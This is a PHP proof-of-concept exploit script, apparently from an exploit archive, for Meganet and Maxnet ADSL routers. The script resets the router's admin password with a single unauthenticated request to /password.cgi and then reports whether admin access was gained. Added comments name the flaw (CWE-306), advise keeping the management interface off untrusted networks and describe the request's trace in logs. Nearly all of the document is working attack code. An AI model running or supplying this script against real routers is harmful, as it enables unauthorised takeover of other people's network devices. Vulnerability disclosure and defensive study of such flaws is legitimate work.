<?php
/*
Exploit Title : Meganet And Maxnet Adsl Routers Unattended Admin access
Date : 24 April 2015
Exploit Author : Koorosh Ghorbani
Site : http://8thbit.net/
Vendor Homepage : NO WEBSITE FOUND
Platform : Hardware
Tested On : Meganet 96333EW
Firmware Version: 3.10L.02.A2pB022g.d20h
--------------------------
Unattended Admin access
--------------------------
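The embedded web server serves CGI files without validating credentials,
so an unauthenticated client can change settings such as the admin password.
Changing the admin password does not require the old password.
This PoC changes the admin password remotely without any authentication.
Defensive note: this is a missing-authentication flaw (CWE-306). Until the firmware
enforces authentication on its CGI endpoints, keep the web management interface
unreachable from untrusted networks.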
-------------------------
PoC Video Link
-------------------------
http://youtu.be/NvNwk3BSjOk
*/
// ASCII-art banner shown at start-up. Rows are kept in double quotes so the
// backslashes in the art stay literal; every row, including the last, is
// terminated with CRLF exactly as in the single-line original.
$bannerRows = array(
    " ___ _______ _ ____ _ _______ ",
    " / _ \__ __| | | _ \(_)__ __|",
    " | (_) | | | | |__ | |_) |_ | | ",
    " > _ < | | | '_ \| _ <| | | | ",
    " | (_) | | | | | | | |_) | | | | ",
    " \___/ |_| |_| |_|____/|_| |_| ",
    " ",
    " ",
);
$banner = implode("\r\n", $bannerRows) . "\r\n";
echo $banner;
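/**
 * Fetch a URL with an HTTP GET request and return the response body.
 *
 * The request carries no credentials (no auth header, no cookie); only a
 * browser-like User-Agent and a Referer value are set.
 *
 * The original wrapped the cURL calls in try/catch (Exception), but the cURL
 * functions report transfer failures by returning false, not by throwing, so
 * a failed request leaked `false` to the caller. Failures are now detected
 * explicitly and mapped to the empty string.
 *
 * @param string $url Absolute URL to request.
 * @return string Response body, or "" when the handle cannot be created or
 *                the transfer fails.
 */
function Get($url)
{
    $curl = curl_init();
    if ($curl === false) {
        error_log("Get: could not initialise a cURL handle");
        return "";
    }

    curl_setopt($curl, CURLOPT_URL, $url);
    curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0");
    // NOTE(review): CURLOPT_REFERER takes the header *value*, so this string
    // puts a literal "Referer: " prefix inside the value. Left unchanged so the
    // request stays identical to the published PoC.
    curl_setopt($curl, CURLOPT_REFERER, "Referer: $url");
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
    // Bound the wait so an unreachable host does not hang the script forever.
    curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 5);
    curl_setopt($curl, CURLOPT_TIMEOUT, 15);

    $result = curl_exec($curl);
    if ($result === false) {
        // curl_error() must be read before the handle is closed.
        error_log("Get: request failed: " . curl_error($curl));
        curl_close($curl);
        return "";
    }

    curl_close($curl);
    return $result;
}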
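// Command-line entry point: expects the device address and the new admin
// password. The value is sent as the sysPassword parameter, i.e. it is the
// router's admin password, not a Wi-Fi key, so the usage text says so.
// An empty password is rejected: an empty needle makes the strpos() check
// below meaningless (it matches at offset 0 on PHP 8, warns on older PHP).
if (sizeof($argv) < 3 || $argv[2] === "") {
    print "Usage : $argv[0] 192.168.1.1 NewAdminPassword\n";
    exit(1);
}

$host = $argv[1];
$plainPassword = $argv[2];
$password = urlencode($plainPassword);

// The request is a plain-HTTP GET with the new password in the query string
// and no credentials attached. For defenders, a request to /password.cgi
// carrying sysPassword from a client with no authenticated session is the
// observable trace of this issue in proxy or device logs.
$target = "http://$host/password.cgi?sysPassword=$password";
$response = Get($target);

// strpos() returns 0 for a match at the very start and false for no match,
// so the original "> 0" test misread a leading match as a failure.
// NOTE(review): a reflected password only shows that the page echoed the
// value; it does not by itself confirm that the stored password changed.
if (strpos($response, $plainPassword) !== false) {
    print "now you have admin access ";
} else {
    print "Humm , No Chance !";
}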
?>